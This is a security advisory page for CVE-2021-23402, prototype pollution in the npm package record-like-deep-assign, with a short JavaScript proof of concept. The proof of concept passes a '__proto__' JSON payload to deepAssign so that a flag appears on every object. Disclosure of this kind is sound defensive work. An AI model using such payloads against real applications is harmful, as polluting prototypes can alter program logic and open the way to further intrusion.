Lucene search
GoogleOSV:GHSA-7QM6-9V49-38M9HistoryDec 10, 2021 - 6:55 p.m.
Prototype Pollution in record-like-deep-assign
2021-12-1018:55:39
Google
osv.dev
4
0.005 Low
EPSS
Percentile
76.3%
All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.
PoC
const deepAssign = require('record-like-deep-assign');
let obj = {};
console.log("Before being polluted: " + obj.polluted);
EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
deepAssign({}, EVIL_JSON);
console.log("After being polluted: " + obj.polluted);
| CPE | Name | Operator | Version |
|---|---|---|---|
| record-like-deep-assign | le | 1.0.1 |
Related
nvd
nvd
CVE-2021-23402
2021-07-02 16:15:08
cvelist
cvelist
CVE-2021-23402 Prototype Pollution
2021-07-02 00:00:00
cve
cve
CVE-2021-23402
2021-07-02 16:15:08
prion
prion
Design/Logic Flaw
2021-07-02 16:15:00
github
github
Prototype Pollution in record-like-deep-assign
2021-12-10 18:55:39